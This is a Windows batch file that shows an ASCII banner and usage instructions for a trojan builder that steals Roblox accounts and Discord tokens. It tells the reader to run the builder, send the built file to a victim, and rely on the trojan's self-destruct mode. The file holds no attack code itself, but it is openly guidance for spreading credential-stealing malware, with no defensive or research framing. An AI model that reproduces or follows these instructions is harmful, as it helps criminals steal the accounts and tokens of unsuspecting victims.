@echo off
color 0A
                                                              
 echo #    #  ####  #    #    #####  ####     #    #  ####  ###### 
 echo #    # #    # #    #      #   #    #    #    # #      #      
 echo ###### #    # #    #      #   #    #    #    #  ####  #####  
 echo #    # #    # # ## #      #   #    #    #    #      # #      
 echo #    # #    # ##  ##      #   #    #    #    # #    # #      
 echo #    #  ####  #    #      #    ####      ####   ####  ###### 
 echo ...
 echo ...
 echo ...
 echo ...
 echo TROJAN BUILDER MADE BY https://github.com/kikmanONTOP
 echo ...
 echo ...
 echo ...
 echo tutorial how to make simple trojan for Roblox Account Stealing and Discord Account Token Stealing
 echo run the trojanbuilder.exe or trojanbuilder.go file
 echo and follow the instructions
 echo and send the builded file to the victim
 echo also remember that every trojan in there have self desctruction mode
 echo also dont change name of files !
 echo also remember that you need to have installed GO LANG https://go.dev/dl/
 echo THIS TROJAN BUILDER WORK ONLY ON WINDOWS !
 echo ...
 echo ...
 echo ...
 echo also read the info about this project on https://github.com/kikmanONTOP/trojanbuilder if you want more about info how to use this simple trojan builder                                                              
pause